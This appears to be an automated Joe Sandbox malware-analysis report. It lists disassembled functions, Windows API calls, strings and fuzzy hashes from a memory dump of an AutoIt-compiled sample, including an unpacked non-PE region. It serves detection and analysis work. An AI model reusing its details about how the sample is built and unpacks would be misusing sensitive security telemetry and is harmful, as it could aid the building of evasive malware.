Opcode ID: 21ef3d1fed3e25a41ec3b571ba5b8606a10456633fea9a2a3d49a1bd9488dbc7
Instruction ID: e52eb6170f6943784bfde8b16b11e4eff6d35774e68210988fd33cf79ef92f8e
Opcode Fuzzy Hash: 21ef3d1fed3e25a41ec3b571ba5b8606a10456633fea9a2a3d49a1bd9488dbc7
Instruction Fuzzy Hash: 0962F570624351EFDF25DF64E885BAA77E4BF44304F05086DF94A8B292DBB0D868CB52

Function 00255C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00255EC3
___createFile.LIBCMT ref: 00255F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00255F2D
__dosmaperr.LIBCMT ref: 00255F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00255F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00255F6A
__dosmaperr.LIBCMT ref: 00255F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00255F7C
__set_osfhnd.LIBCMT ref: 00255FAC
__lseeki64_nolock.LIBCMT ref: 00256016
__close_nolock.LIBCMT ref: 0025603C
__chsize_nolock.LIBCMT ref: 0025606C
__lseeki64_nolock.LIBCMT ref: 0025607E
__lseeki64_nolock.LIBCMT ref: 00256176
__lseeki64_nolock.LIBCMT ref: 0025618B
__close_nolock.LIBCMT ref: 002561EB

Part of subcall function 0024EA9C: CloseHandle.KERNELBASE(00000000,002CEEF4,00000000,?,00256041,002CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0024EAEC
Part of subcall function 0024EA9C: GetLastError.KERNEL32(?,00256041,002CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0024EAF6
Part of subcall function 0024EA9C: __free_osfhnd.LIBCMT ref: 0024EB03
Part of subcall function 0024EA9C: __dosmaperr.LIBCMT ref: 0024EB25

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

__lseeki64_nolock.LIBCMT ref: 0025620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00256342
___createFile.LIBCMT ref: 00256361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0025636E
__dosmaperr.LIBCMT ref: 00256375
__free_osfhnd.LIBCMT ref: 00256395
__invoke_watson.LIBCMT ref: 002563C3
__wsopen_helper.LIBCMT ref: 002563DD

Strings

@, xrefs: 00255F98

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: f2ab759de249c80493cdf84508935f1d532bcfd94f4d6663393e776ba6333a80
Instruction ID: b2e316188882900c85816e38dc478d0635b6e3ce545bf722d011618d4797ee4e
Opcode Fuzzy Hash: f2ab759de249c80493cdf84508935f1d532bcfd94f4d6663393e776ba6333a80
Instruction Fuzzy Hash: 812255719305179BEF299F68CC99BBD7B31EB00322F244228EC219B2E1C7758D68CB55

Function 0026FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0026FA96
_wcschr.LIBCMT ref: 0026FAA4
_wcscpy.LIBCMT ref: 0026FABB
_wcscat.LIBCMT ref: 0026FACA
_wcscat.LIBCMT ref: 0026FAE8
_wcscpy.LIBCMT ref: 0026FB09
__wsplitpath.LIBCMT ref: 0026FBE6
_wcscpy.LIBCMT ref: 0026FC0B
_wcscpy.LIBCMT ref: 0026FC1D
_wcscpy.LIBCMT ref: 0026FC32
_wcscat.LIBCMT ref: 0026FC47
_wcscat.LIBCMT ref: 0026FC59
_wcscat.LIBCMT ref: 0026FC6E

Part of subcall function 0026BFA4: _wcscmp.LIBCMT ref: 0026C03E
Part of subcall function 0026BFA4: __wsplitpath.LIBCMT ref: 0026C083
Part of subcall function 0026BFA4: _wcscpy.LIBCMT ref: 0026C096
Part of subcall function 0026BFA4: _wcscat.LIBCMT ref: 0026C0A9
Part of subcall function 0026BFA4: __wsplitpath.LIBCMT ref: 0026C0CE
Part of subcall function 0026BFA4: _wcscat.LIBCMT ref: 0026C0E4
Part of subcall function 0026BFA4: _wcscat.LIBCMT ref: 0026C0F7

Strings

t2-, xrefs: 0026FC97
>>>AUTOIT SCRIPT<<<, xrefs: 0026FA61

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2-
API String ID: 2955681530-3384216220
Opcode ID: a03707216142a8f60386c9566eb632373ff2930a38abef6e5be9a226d4802a66
Instruction ID: c1719bc0c90198b3451c1a51ccca394fe36dfa030d17480a530e9475ba767dde
Opcode Fuzzy Hash: a03707216142a8f60386c9566eb632373ff2930a38abef6e5be9a226d4802a66
Instruction Fuzzy Hash: A491A371524305AFCF14EF54D991E9AB3E8BF48300F04486EF94997291DB30EAA8CF92

Function 0026BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0026BDB4: __time64.LIBCMT ref: 0026BDBE

Part of subcall function 00224517: _fseek.LIBCMT ref: 0022452F

__wsplitpath.LIBCMT ref: 0026C083

Part of subcall function 00241DFC: __wsplitpath_helper.LIBCMT ref: 00241E3C

_wcscpy.LIBCMT ref: 0026C096
_wcscat.LIBCMT ref: 0026C0A9
__wsplitpath.LIBCMT ref: 0026C0CE
_wcscat.LIBCMT ref: 0026C0E4
_wcscat.LIBCMT ref: 0026C0F7
_wcscmp.LIBCMT ref: 0026C03E

Part of subcall function 0026C56D: _wcscmp.LIBCMT ref: 0026C65D
Part of subcall function 0026C56D: _wcscmp.LIBCMT ref: 0026C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0026C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0026C338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0026C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0026C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0026C371

Strings

p1#v`K$v, xrefs: 0026C2A1, 0026C338, 0026C35F, 0026C371

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID: p1#v`K$v
API String ID: 2378138488-1068180069
Opcode ID: 060704c2ac82d73f751d75be31156ecbc328b8f2703babf6cbde269763e1b9d0
Instruction ID: 9a37b9585af0b9069181e6d8090d2daadd0d3e02de4283e2f5d3636565f2b13f
Opcode Fuzzy Hash: 060704c2ac82d73f751d75be31156ecbc328b8f2703babf6cbde269763e1b9d0
Instruction Fuzzy Hash: FBC13EB1E10229ABDF11EF95DC81EEEB7BCAF49300F1040A6F649E6151DB709A94CF61

Function 00223F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00223F86
RegisterClassExW.USER32(00000030), ref: 00223FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00223FC1
InitCommonControlsEx.COMCTL32(?), ref: 00223FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00223FEE
LoadIconW.USER32(000000A9), ref: 00224004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00224013

Strings

AutoIt v3 GUI, xrefs: 00223FA2
0, xrefs: 00223F68
+, xrefs: 00223F6F
TaskbarCreated, xrefs: 00223FB6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 9600cd9886f2774ec9731f43347449765f391aed5ef853c72fb64fcdd6dd1c1c
Instruction ID: abd2459afd4e17e780288946a47fd5ab95390c8d2a54faa73f9c244eedf70cd8
Opcode Fuzzy Hash: 9600cd9886f2774ec9731f43347449765f391aed5ef853c72fb64fcdd6dd1c1c
Instruction Fuzzy Hash: 7421C7B5950358AFDB00DFA5FC8DBCDBBB8FB09700F00412AF615AA2A0D7B445548F91

Function 00223742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 002237B3
KillTimer.USER32(?,00000001), ref: 002237DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00223800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0022380B
CreatePopupMenu.USER32 ref: 0022381F
PostQuitMessage.USER32(00000000), ref: 0022382E

Strings

TaskbarCreated, xrefs: 00223806

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: a27db4f5949621ac8fe2d3021c6819cec66cda6ed667f2086667c9dde25d3451
Instruction ID: e452ecee3b68e72741cdd379c70ac4cbe3c2f1b0a4581997113e03efe982f241
Opcode Fuzzy Hash: a27db4f5949621ac8fe2d3021c6819cec66cda6ed667f2086667c9dde25d3451
Instruction Fuzzy Hash: 4B41D2B11741A6B7DF14DFA8BC4EBB97659F701700F400125F902DA191CEB89AB08A61

Function 00223E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00223E79
LoadCursorW.USER32(00000000,00007F00), ref: 00223E88
LoadIconW.USER32(00000063), ref: 00223E9E
LoadIconW.USER32(000000A4), ref: 00223EB0
LoadIconW.USER32(000000A2), ref: 00223EC2

Part of subcall function 00224024: LoadImageW.USER32(00220000,00000063,00000001,00000010,00000010,00000000), ref: 00224048

RegisterClassExW.USER32(?), ref: 00223F30

Part of subcall function 00223F53: GetSysColorBrush.USER32(0000000F), ref: 00223F86
Part of subcall function 00223F53: RegisterClassExW.USER32(00000030), ref: 00223FB0
Part of subcall function 00223F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00223FC1
Part of subcall function 00223F53: InitCommonControlsEx.COMCTL32(?), ref: 00223FDE
Part of subcall function 00223F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00223FEE
Part of subcall function 00223F53: LoadIconW.USER32(000000A9), ref: 00224004
Part of subcall function 00223F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00224013

Strings

0, xrefs: 00223F02
#, xrefs: 00223F09
AutoIt v3, xrefs: 00223F1F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d92f6d8cc8fda627844e89a10495a8573ff4de33db833e1cac361a21d3e029df
Instruction ID: bb621fb4fbe36db9ff186c221416bb20b67df6a073e2f497bd8419987266848c
Opcode Fuzzy Hash: d92f6d8cc8fda627844e89a10495a8573ff4de33db833e1cac361a21d3e029df
Instruction Fuzzy Hash: CD2136B0E50354ABCB04DFA9FC8DA99BBF5EB48310F00412AE619AA2A0D77546648F91

Function 0024ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0024ACC1

Part of subcall function 00247CF4: __mtinitlocknum.LIBCMT ref: 00247D06
Part of subcall function 00247CF4: EnterCriticalSection.KERNEL32(00000000,?,00247ADD,0000000D), ref: 00247D1F

__calloc_crt.LIBCMT ref: 0024ACD2

Part of subcall function 00246986: __calloc_impl.LIBCMT ref: 00246995
Part of subcall function 00246986: Sleep.KERNEL32(00000000,000003BC,0023F507,?,0000000E), ref: 002469AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0024ACED
GetStartupInfoW.KERNEL32(?,002D6E28,00000064,00245E91,002D6C70,00000014), ref: 0024AD46
__calloc_crt.LIBCMT ref: 0024AD91
GetFileType.KERNEL32(00000001), ref: 0024ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0024AE11

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: c3468bdb527ec7f9ec4ec3fd5e1ba055d8c71e451810f6e7daab1849ce66d689
Instruction ID: 819e893afa7b69e804b6a8c3062f61bfd0a0c0c919a70dcc6c5138e473a5bde5
Opcode Fuzzy Hash: c3468bdb527ec7f9ec4ec3fd5e1ba055d8c71e451810f6e7daab1849ce66d689
Instruction Fuzzy Hash: 4281F471A653428FDB18CF68D8845ADBBF0AF0A324B24426DD4B6AB3D1C7759813CF52

Function 018771A0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01877271
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01877497

Memory Dump Source

Source File: 00000000.00000002.2157695830.0000000001874000.00000040.00000020.00020000.00000000.sdmp, Offset: 01874000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1874000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: 85f1d0f3588b4da7f95c4373340c0b22c4a4dc03e9067e07f06290db2a8df4d5
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: 2DA11A70E00209EBDB14CFA8C899BEEBBB5FF48304F208559E615BB280D7759A41CF95

Function 002249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00224A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002941DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0029421A
RegCloseKey.ADVAPI32(?), ref: 00294249

Strings

Include, xrefs: 002941D3, 00294212
Software\AutoIt v3\AutoIt, xrefs: 00224A13

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: d4acc4ca11517c2232e2ef500cd5d7f57cf6a1b49e8bab60c09569f314c2ab22
Instruction ID: 5bb8f48f9ad5c238065e5834d7c4c154a6045a7d8373db0d4ae9538bfcca189e
Opcode Fuzzy Hash: d4acc4ca11517c2232e2ef500cd5d7f57cf6a1b49e8bab60c09569f314c2ab22
Instruction Fuzzy Hash: 37116D75A20119BFEB00ABA4DD8AEFFBBACEF05344F000065B606D6191EA709E129B50

Function 002236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002236E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00223707
ShowWindow.USER32(00000000,?,?,?,?,00223AA3,?), ref: 0022371B
ShowWindow.USER32(00000000,?,?,?,?,00223AA3,?), ref: 00223724

Strings

AutoIt v3, xrefs: 002236DE, 002236E3, 002236E4
edit, xrefs: 00223701

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: d1938eb2aa29beb8fd5c622bbcf7e2def94d83361eb62b6ffa911a0a0c2f5e7b
Instruction ID: d52adb79a17b6703ad941954c74a4ee1847d112f9e2e00e0cc89ef33c5c6180e
Opcode Fuzzy Hash: d1938eb2aa29beb8fd5c622bbcf7e2def94d83361eb62b6ffa911a0a0c2f5e7b
Instruction Fuzzy Hash: EFF0DA755902D07AEB319757BC8CEA76E7DD7C7F60B00002ABE05AA1A0D57108E5DAB0

Function 01876F50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01876E40: Sleep.KERNELBASE(000001F4), ref: 01876E51

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01877099

Strings

2R90VUBGDM7GPF4T10FVIW4LWZ, xrefs: 018770FC, 018770FF

Memory Dump Source

Source File: 00000000.00000002.2157695830.0000000001874000.00000040.00000020.00020000.00000000.sdmp, Offset: 01874000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1874000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateFileSleep
String ID: 2R90VUBGDM7GPF4T10FVIW4LWZ
API String ID: 2694422964-2095193267
Opcode ID: 329b25d8a9b841bd53d29a8a2f1d2732b1ead1f84eeda76b3707b1f74670f39e
Instruction ID: a21549e776ea3c3aeb5f8ad0d9a3e77752c0176ee1c78775bb1f2ae92d0161f6
Opcode Fuzzy Hash: 329b25d8a9b841bd53d29a8a2f1d2732b1ead1f84eeda76b3707b1f74670f39e
Instruction Fuzzy Hash: 31619070D04288DAEF11DBF8C858BDEBBB5AF15304F044199E249BB2C1D7B95B44CB66

Function 00224A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00225374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002E1148,?,002261FF,?,00000000,00000001,00000000), ref: 00225392

Part of subcall function 002249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00224A1D

_wcscat.LIBCMT ref: 00292D80
_wcscat.LIBCMT ref: 00292DB5

Strings

\, xrefs: 00292DA2
8!., xrefs: 00224B1C
\Include\, xrefs: 00224B0A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!.$\$\Include\
API String ID: 3592542968-551335519
Opcode ID: 7a21c2541e4efb14ef3a8fd0e6b09176d4cb11bc27f364fb630746d8d0d01ea6
Instruction ID: 0be7d1fe95acc6266c757bc92fa484514ba8fa17f219ea36791ec89f115a3521
Opcode Fuzzy Hash: 7a21c2541e4efb14ef3a8fd0e6b09176d4cb11bc27f364fb630746d8d0d01ea6
Instruction Fuzzy Hash: E0517172464390EBC704EF55F9C589AB7FCBE59300B40452EF24A9B262EB709A5CCF61

Function 002251AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0022522F
_wcscpy.LIBCMT ref: 00225283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00225293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00293CB0

Strings

Line: , xrefs: 00293CD9

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: a0d36ba37078f791326318f208936bc4fc363c1894ad2019309af711760a5101
Instruction ID: 63296b3cc00599591f0587531c6e13144768e56b0fe62fe03f34eeb2a143a19a
Opcode Fuzzy Hash: a0d36ba37078f791326318f208936bc4fc363c1894ad2019309af711760a5101
Instruction Fuzzy Hash: FD31C171428760BAD320EBA0FC4AFDE77D8AB44300F00851EF98996091DB70A678CF92

Function 00224139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 002241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002239FE,?,00000001), ref: 002241DB

_free.LIBCMT ref: 002936B7
_free.LIBCMT ref: 002936FE

Part of subcall function 0022C833: __wsplitpath.LIBCMT ref: 0022C93E
Part of subcall function 0022C833: _wcscpy.LIBCMT ref: 0022C953
Part of subcall function 0022C833: _wcscat.LIBCMT ref: 0022C968
Part of subcall function 0022C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0022C978

Strings

Bad directive syntax error, xrefs: 002936E4
>>>AUTOIT SCRIPT<<<, xrefs: 00293491

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
